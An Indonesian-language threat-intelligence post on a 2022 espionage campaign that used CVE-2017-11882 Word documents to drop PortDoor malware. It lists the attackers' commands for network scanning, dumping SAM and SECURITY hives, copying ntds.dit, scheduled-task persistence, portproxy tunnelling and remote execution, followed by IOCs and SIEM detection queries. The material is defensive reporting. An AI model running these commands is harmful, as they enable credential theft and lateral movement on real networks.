Ara-genriset.com - Pakar Kaspersky ICS CERT pertanggal (9 Agustus 2022) mendeteksi gelombang serangan yang ditargetkan pada perusahaan kompleks industri militer dan lembaga publik di beberapa negara Eropa Timur dan Afghanistan.
Para penyerang mampu menembus lusinan perusahaan dan bahkan membajak beberapa infrastruktur TI, mengambil alih sistem yang digunakan untuk mengelola keamanan.
Analisis informasi yang diperoleh selama penyelidikan Kaspersky menunjukkan bahwa spionase adalah tujuan dari rangkaian serangan ini.
RINGKASAN SERANGAN
Serangan dimulai dengan email Phishing yang berisi dokumen Microsoft Word dengan kode berbahaya tertanam didalamnya yang mengeksploitasi celah CVE-2017-11882 . Teks dalam dokumen tersebut dibuat menggunakan rincian spesifik tentang operasi organisasi, beberapa di antaranya mungkin tidak tersedia untuk umum.
Kerentanan CVE-2017-11882 ada di versi lama dari Editor Microsoft (komponen Microsoft Office). Celah ini memungkinkan penyerang untuk menggunakan urutan byte yang dibuat khusus yang disamarkan sebagai persamaan, yang, ketika diproses, akan menghasilkan kode arbitrer yang dieksekusi atas nama pengguna.
Kerentanan memungkinkan malware untuk menguasai sistem yang terinfeksi tanpa aktivitas pengguna tambahan. Misalnya, pengguna tidak perlu mengaktifkan makro, yang diperlukan oleh sebagian besar serangan.
BACKDOOR CYBERESPIONAGE
Untuk mencapai tujuan mereka, cyberspies China menggunakan email spear phishing yang berisi informasi rahasia tentang organisasi yang ditargetkan dan kode berbahaya yang mengeksploitasi kerentanan Microsoft Office CVE-2017-11882 untuk menyebarkan malware PortDoor.
Kode berbahaya yang disematkan dalam dokumen menjatuhkan malware PortDoor. Menurut Cybereason pada postingan blognya mengatakan, bahwa malware sebelumnya telah digunakan oleh TA428 APT.
Eksekusi PortDoor pertama-tama diekstraksi ke direktori %AppData%\Local\Temp dengan nama 8.t, setelah itu dipindahkan ke direktori startup Microsoft Word, %AppData%\Roaming\Microsoft\Word\STARTUP, dengan nama yang spesifik untuk setiap serangan, seperti strsrv.wll.
Pada tahap serangan berikutnya, grup memasang malware tambahan yang ditautkan ke TA428 (yaitu, nccTrojan, Logtu, Cotx, dan DNSep), serta jenis malware yang belum pernah terlihat bernama CotSam.
PROSES PENGUMPULAN INFORMASI TENTANG INFRASTRUKTUR PERUSAHAAN
Para penyerang sebagian besar memindai jaringan menggunakan utilitas konsol NBTscan, yang dikirimkan ke komputer korban sebagai arsip .cab bernama ace.cab dan dibongkar menggunakan utilitas sistem perluasan:
expand.exe ace.cab ace.exe
ace -n 172.22.0.0/16
query user
net user
net group
ipconfig /all
netstat -no
netstat -no | findstr 3389
netstat -ano | findstr 2589
net use \\[IP address]\IPC$ "[password]" /u:"[user name]"
xcopy.exe /s \\[IP address]\c$\windows\web\*" $windir\Web\ /y /e /i /q
cscript.exe //nologo wmic.vbs /cmd [IP address] [user name][password] $appdata\ABBYY\Install.exe
schtasks /create /tn CacheTasks /tr “$appdata\ABBYY\FineReader\WINWORD.EXE” /sc minute /mo 50 /ru “” /f
netsh interface portproxy add v4tov4 2589 <IP address> 443
reg save HKLM\SAM sam.save
reg save HKLM\SECURITY security.save
c:\programdata\microsoft\sc64.exe c:\windows\ntds\ntds.dit
c:\programdata\microsoft\ntds.dit
nltest /domain_trusts
0A2E7C01B847D3B1C6EEBE6AF63DC140 0A945587E0E11A89D72B4C0B45A4F77E 10818F47AA4DC2B39A7B5EEF652F3C68 1157132504BE3BF556A80DB8A2FF9395 11955356232DCF6834515BF111BB5138 11BA5665EC1DBA660401AFDE64C2B125 17FA7898D040FA647AFA4467921A66CF 180EE3E469BFCFC079E1A46D16440467 1EA58FF469F5EE0FDCF5B30FC19E4CB8 216D9F82BA2B9289E68F9778E1E40AC9 29B62694DC9F720BD09438F37B7B358A 3953EB8F7825E756515BE79EF45655B0 3A13B99B2567190AB87E8AB745761017 40EB08F151859C1FE4DC8E6BC466B06F 413FA4AD3AFE00B34102C520A91F031C 4866622D249F3EA114495A4A249F3064 4AD1AD14044BD2C5A5C5E7E7DD954B23 4D42C314FF4341F2D1315D7810BD4E15 51367DC409A7A7E5521C2F700C56A452 51BEFD74AC3B8943DA58C841017A57A8 56AF3279253E4A60BD080DD6A5CA7BA8 5EA338D71D2A49E7B3259BC52F424303 5EB42E1BA99FACE02CE50EA1AAF72AB5 6038583B155F73FAF1B5EF8135154278 64EF950D1F31A41FE60C0FD10CA46109 6652923CE80A073FD985E20B8580E703 6BDF1C294B6A34A5769E872D49AFD9E7 6DFC3BDD2B70670BF29506E5828F627E 70DA6872B6B2DA9DDC94D14B02302917 7101FE9E82E9B0E727B64608C9FD5DF1 7C383C9CA29F78FCC815EAEA9373B4BB 7FE40325F0CEF8A32E69A6087EBC7157 84DF335EBC10633DA1524C7DBB836994 87AA0BEDF293E9B16A93E4411353F367 94AF1B400FDBDEBD8EDA337474C07479 AA7231904A125273F5E5EE55A1441BA4 AB26F4C877A7357CABF95FB5033A5BEF AB55A08ED77736CE6D26874187169BC9 AE11F7218E919DF5B8A9A2C0DC247F56 B2C9F5CAE72AF5A50940D55BB5B92E98 C6D6CFFD56638A68A0DE11035B9C9097 CBECDFA1D0708D60500864A2A9DE4992 CCC9482A7BEE777BBB08172DCCDAB8AA D394F005416A20505C597ECF7882450F D44A276529343F7AC291AD7AD0B99378 D669B03807102B4AF87B20EC3731909A DA765E4E6B0D2544FE3F71E384812C40 E005F5DA3BA5D6726DA4E6671605B814 E2A3CD2B3C2E43CA08D2B9EE78D4919B E8800D59C411A948EE966FF745FBD5C9 E8A16193BCD477D8231E6FC1A484DC8A EBCFFECE1B1AF517743D3DFFDE72CB43 F01A9A2D1E31332ED36C1A4D2839F412 FB2B4C9CA6A7871A98C6E2405E27A21F FF6D8578BE65A31F3624B62E07BEF795 6860189B79FF35199F99171548F5CD65 9EC56A18333D4D4E4D3C361D487C05BD E5B6571E1512D3896F8C2367DDC5A02D 7CB0D8CFFE48DF7B531B6BEDE8137199 86BB8FA0D00FD94F15AE1BD001037C6C 9F5BBA1ACEF3CCBBDC789F8813B99067 4EA2B943A1D9539E42C5BDBA3D3CA7A0 5934B7E24D03E92B3DBACBE49F6E677C C8F13C9890CEB695538FDC44AD817278 BABDF6FA73E48345F00462C3EF556B86 CBB7E0B8DDE2241480B71B9C648C1501
www1.nppnavigator[.]net www3.vpkimplus[.]com 45.151.180[.]178 custom.songuulcomiss[.]com tech.songuulcomiss[.]com video.nicblainfo[.]net 160.202.162[.]122 doc.redstrpela[.]net fax.internnetionfax[.]com www2.defensysminck[.]net info.ntcprotek[.]com www1.dotomater[.]club 192.248.182[.]121 www2.sdelanasnou[.]com 54.36.189[.]105 5.180.174[.]10 45.63.27[.]162 server.dotomater[.]club
source="WinEventLog:*" AND (((TargetFilename="*8.t" OR TargetFilename="*.t" OR TargetFilename="*strsrv.wll") AND (TargetFilename="*\\Users\*\\Downloads\*" OR TargetFilename="*\\Users\*\\Content.Outlook\*" OR TargetFilename="*\\Users\*\\AppData\\Local\\Temp\*" OR TargetFilename="*\\Roaming\\Microsoft\\Word\\STARTUP\*")) OR ((Image="*\\cmd.exe" OR Image="*\\cscript.exe" OR Image="*\\schtasks" OR Image="*nltest.exe" OR Image="*xcopy.exe" OR Image="*expand.exe") AND (CommandLine="*expand.exe*" OR CommandLine="*.cab*" OR CommandLine="*ace*" OR CommandLine="*net user*" OR CommandLine="*net*" OR CommandLine="*group*" OR CommandLine="*netstat*" OR CommandLine="*query*" OR CommandLine="*user*" OR CommandLine="*create*" OR CommandLine="*net use*" OR CommandLine="*xcopy.exe*" OR CommandLine="*cscript.exe*" OR CommandLine="*schtasks*" OR CommandLine="*netsh*" OR CommandLine="*reg save*" OR CommandLine="*ntds.dit*" OR CommandLine="*windir\\Web*" OR CommandLine="*nltest*" OR CommandLine="*domain_trusts*" OR CommandLine="*portproxy*" OR CommandLine="*WINWORD.EXE*" OR CommandLine="*//nologo*" OR CommandLine="*CacheTasks*" OR CommandLine="*domain_trusts*")))
SELECT UTF8(payload) from events where (LOGSOURCETYPENAME(devicetype)='Microsoft Windows Security Event Log' and (CATEGORYNAME(category) ILIKE 'File Created' or CATEGORYNAME(category) ILIKE 'Successful File Modification')) and ((("Filename" ilike '%8.t' or "Filename" ilike '%.t' or "Filename" ilike '%strsrv.wll') and ("Filename" ilike '%\Users\%\Downloads\%' or "Filename" ilike '%\Users\%\Content.Outlook\%' or "Filename" ilike '%\Users\%\AppData\Local\Temp\%' or "Filename" ilike '%\Roaming\Microsoft\Word\STARTUP\%')) or (("Image" ilike '%\cmd.exe' or "Image" ilike '%\cscript.exe' or "Image" ilike '%\schtasks' or "Image" ilike '%nltest.exe' or "Image" ilike '%xcopy.exe' or "Image" ilike '%expand.exe') and ("Process CommandLine" ilike '%expand.exe%' or "Process CommandLine" ilike '%.cab%' or "Process CommandLine" ilike '%ace%' or "Process CommandLine" ilike '%net user%' or "Process CommandLine" ilike '%net%' or "Process CommandLine" ilike '%group%' or "Process CommandLine" ilike '%netstat%' or "Process CommandLine" ilike '%query%' or "Process CommandLine" ilike '%user%' or "Process CommandLine" ilike '%create%' or "Process CommandLine" ilike '%net use%' or "Process CommandLine" ilike '%xcopy.exe%' or "Process CommandLine" ilike '%cscript.exe%' or "Process CommandLine" ilike '%schtasks%' or "Process CommandLine" ilike '%netsh%' or "Process CommandLine" ilike '%reg save%' or "Process CommandLine" ilike '%ntds.dit%' or "Process CommandLine" ilike '%windir\Web%' or "Process CommandLine" ilike '%nltest%' or "Process CommandLine" ilike '%domain_trusts%' or "Process CommandLine" ilike '%portproxy%' or "Process CommandLine" ilike '%WINWORD.EXE%' or "Process CommandLine" ilike '%//nologo%' or "Process CommandLine" ilike '%CacheTasks%' or "Process CommandLine" ilike '%domain_trusts%')))
((file.path.text:(*8.t OR *.t OR *strsrv.wll) AND file.path.text:(*\\Users\*\\Downloads\* OR *\\Users\*\\Content.Outlook\* OR *\\Users\*\\AppData\\Local\\Temp\* OR *\\Roaming\\Microsoft\\Word\\STARTUP\*)) OR (process.executable.text:(*\\cmd.exe OR *\\cscript.exe OR *\\schtasks OR *nltest.exe OR *xcopy.exe OR *expand.exe) AND process.command_line.text:(*expand.exe* OR *.cab* OR *ace* OR *net\ user* OR *net* OR *group* OR *netstat* OR *query* OR *user* OR *create* OR *net\ use* OR *xcopy.exe* OR *cscript.exe* OR *schtasks* OR *netsh* OR *reg\ save* OR *ntds.dit* OR *windir\\Web* OR *nltest* OR *domain_trusts* OR *portproxy* OR *WINWORD.EXE* OR *\/\/nologo* OR *CacheTasks* OR *domain_trusts*)))
((filemod_name:(*8.t OR *.t OR *strsrv.wll) AND filemod_name:(*\\Users\*\\Downloads\* OR *\\Users\*\\Content.Outlook\* OR *\\Users\*\\AppData\\Local\\Temp\* OR *\\Roaming\\Microsoft\\Word\\STARTUP\*)) OR (process_name:(*\\cmd.exe OR *\\cscript.exe OR *\\schtasks OR *nltest.exe OR *xcopy.exe OR *expand.exe) AND process_cmdline:(*expand.exe* OR *.cab* OR *ace* OR *net\ user* OR *net* OR *group* OR *netstat* OR *query* OR *user* OR *create* OR *net\ use* OR *xcopy.exe* OR *cscript.exe* OR *schtasks* OR *netsh* OR *reg\ save* OR *ntds.dit* OR *windir\\Web* OR *nltest* OR *domain_trusts* OR *portproxy* OR *WINWORD.EXE* OR *\/\/nologo* OR *CacheTasks* OR *domain_trusts*)))
((TargetFilename.keyword:(*8.t *.t *strsrv.wll) AND TargetFilename.keyword:(*\\Users\*\\Downloads\* *\\Users\*\\Content.Outlook\* *\\Users\*\\AppData\\Local\\Temp\* *\\Roaming\\Microsoft\\Word\\STARTUP\*)) OR (Image.keyword:(*\\cmd.exe *\\cscript.exe *\\schtasks *nltest.exe *xcopy.exe *expand.exe) AND CommandLine.keyword:(*expand.exe* *.cab* *ace* *net\ user* *net* *group* *netstat* *query* *user* *create* *net\ use* *xcopy.exe* *cscript.exe* *schtasks* *netsh* *reg\ save* *ntds.dit* *windir\\Web* *nltest* *domain_trusts* *portproxy* *WINWORD.EXE* *\/\/nologo* *CacheTasks* *domain_trusts*)))
((TargetFilename IN ["*8.t", "*.t", "*strsrv.wll"] TargetFilename IN ["*\\Users\*\\Downloads\*", "*\\Users\*\\Content.Outlook\*", "*\\Users\*\\AppData\\Local\\Temp\*", "*\\Roaming\\Microsoft\\Word\\STARTUP\*"]) OR (Image IN ["*\\cmd.exe", "*\\cscript.exe", "*\\schtasks", "*nltest.exe", "*xcopy.exe", "*expand.exe"] CommandLine IN ["*expand.exe*", "*.cab*", "*ace*", "*net user*", "*net*", "*group*", "*netstat*", "*query*", "*user*", "*create*", "*net use*", "*xcopy.exe*", "*cscript.exe*", "*schtasks*", "*netsh*", "*reg save*", "*ntds.dit*", "*windir\\Web*", "*nltest*", "*domain_trusts*", "*portproxy*", "*WINWORD.EXE*", "*//nologo*", "*CacheTasks*", "*domain_trusts*"]))
DeviceFileEvents | where (((FolderPath endswith "8.t" or FolderPath endswith ".t" or FolderPath endswith "strsrv.wll") and (FolderPath matches regex @".*\\Users\.*\\Downloads\.*" or FolderPath matches regex @".*\\Users\.*\\Content\.Outlook\.*" or FolderPath matches regex @".*\\Users\.*\\AppData\\Local\\Temp\.*" or FolderPath contains @"\Roaming\Microsoft\Word\STARTUP")) or ((InitiatingProcessFolderPath endswith @"\cmd.exe" or InitiatingProcessFolderPath endswith @"\cscript.exe" or InitiatingProcessFolderPath endswith @"\schtasks" or InitiatingProcessFolderPath endswith "nltest.exe" or InitiatingProcessFolderPath endswith "xcopy.exe" or InitiatingProcessFolderPath endswith "expand.exe") and (InitiatingProcessCommandLine contains "expand.exe" or InitiatingProcessCommandLine contains ".cab" or InitiatingProcessCommandLine contains "ace" or InitiatingProcessCommandLine contains "net user" or InitiatingProcessCommandLine contains "net" or InitiatingProcessCommandLine contains "group" or InitiatingProcessCommandLine contains "netstat" or InitiatingProcessCommandLine contains "query" or InitiatingProcessCommandLine contains "user" or InitiatingProcessCommandLine contains "create" or InitiatingProcessCommandLine contains "net use" or InitiatingProcessCommandLine contains "xcopy.exe" or InitiatingProcessCommandLine contains "cscript.exe" or InitiatingProcessCommandLine contains "schtasks" or InitiatingProcessCommandLine contains "netsh" or InitiatingProcessCommandLine contains "reg save" or InitiatingProcessCommandLine contains "ntds.dit" or InitiatingProcessCommandLine contains @"windir\Web" or InitiatingProcessCommandLine contains "nltest" or InitiatingProcessCommandLine contains "domain_trusts" or InitiatingProcessCommandLine contains "portproxy" or InitiatingProcessCommandLine contains "WINWORD.EXE" or InitiatingProcessCommandLine contains "//nologo" or InitiatingProcessCommandLine contains "CacheTasks" or InitiatingProcessCommandLine contains "domain_trusts")))
SecurityEvent | where EventID == 11 | where (((TargetFilename endswith '8.t' or TargetFilename endswith '.t' or TargetFilename endswith 'strsrv.wll') and (TargetFilename matches regex '(?i).*\Users\.*\Downloads\.*' or TargetFilename matches regex '(?i).*\Users\.*\Content.Outlook\.*' or TargetFilename matches regex '(?i).*\Users\.*\AppData\Local\Temp\.*' or TargetFilename contains @'\Roaming\Microsoft\Word\STARTUP')) or ((Image endswith @'\cmd.exe' or Image endswith @'\cscript.exe' or Image endswith @'\schtasks' or Image endswith 'nltest.exe' or Image endswith 'xcopy.exe' or Image endswith 'expand.exe') and (CommandLine contains 'expand.exe' or CommandLine contains '.cab' or CommandLine contains 'ace' or CommandLine contains 'net user' or CommandLine contains 'net' or CommandLine contains 'group' or CommandLine contains 'netstat' or CommandLine contains 'query' or CommandLine contains 'user' or CommandLine contains 'create' or CommandLine contains 'net use' or CommandLine contains 'xcopy.exe' or CommandLine contains 'cscript.exe' or CommandLine contains 'schtasks' or CommandLine contains 'netsh' or CommandLine contains 'reg save' or CommandLine contains 'ntds.dit' or CommandLine contains @'windir\Web' or CommandLine contains 'nltest' or CommandLine contains 'domain_trusts' or CommandLine contains 'portproxy' or CommandLine contains 'WINWORD.EXE' or CommandLine contains '//nologo' or CommandLine contains 'CacheTasks' or CommandLine contains 'domain_trusts')))
(_sourceCategory=*windows* AND (((("8.t" OR ".t" OR "strsrv.wll") AND (("\Users\" AND "\Downloads\") OR ("\Users\" AND "\Content.Outlook\") OR ("\Users\" AND "\AppData\Local\Temp\") OR "\Roaming\Microsoft\Word\STARTUP\")) OR ((Image = "*\cmd.exe" OR Image = "*\cscript.exe" OR Image = "*\schtasks" OR Image = "*nltest.exe" OR Image = "*xcopy.exe" OR Image = "*expand.exe") AND (CommandLine = "*expand.exe*" OR CommandLine = "*.cab*" OR CommandLine = "*ace*" OR CommandLine = "*net user*" OR CommandLine = "*net*" OR CommandLine = "*group*" OR CommandLine = "*netstat*" OR CommandLine = "*query*" OR CommandLine = "*user*" OR CommandLine = "*create*" OR CommandLine = "*net use*" OR CommandLine = "*xcopy.exe*" OR CommandLine = "*cscript.exe*" OR CommandLine = "*schtasks*" OR CommandLine = "*netsh*" OR CommandLine = "*reg save*" OR CommandLine = "*ntds.dit*" OR CommandLine = "*windir\Web*" OR CommandLine = "*nltest*" OR CommandLine = "*domain_trusts*" OR CommandLine = "*portproxy*" OR CommandLine = "*WINWORD.EXE*" OR CommandLine = "*//nologo*" OR CommandLine = "*CacheTasks*" OR CommandLine = "*domain_trusts*")))))
(((TargetFilename contains '8\.t', '.t', 'strsrv\.wll') && (TargetFilename contains '\Roaming\\Microsoft\\Word\\STARTUP\' || TargetFilename regex '.*\\Users\.*\\Downloads\.*', '.*\\Users\.*\\Content\.Outlook\.*', '.*\\Users\.*\\AppData\\Local\\Temp\.*')) || ((Image contains '\cmd\.exe', '\cscript\.exe', '\schtasks', 'nltest\.exe', 'xcopy\.exe', 'expand\.exe') && (CommandLine contains 'expand\.exe', '.cab', 'ace', 'net user', 'net', 'group', 'netstat', 'query', 'user', 'create', 'net use', 'xcopy\.exe', 'cscript\.exe', 'schtasks', 'netsh', 'reg save', 'ntds\.dit', 'windir\\Web', 'nltest', 'domain_trusts', 'portproxy', 'WINWORD\.EXE', '//nologo', 'CacheTasks', 'domain_trusts')))
Posting Komentar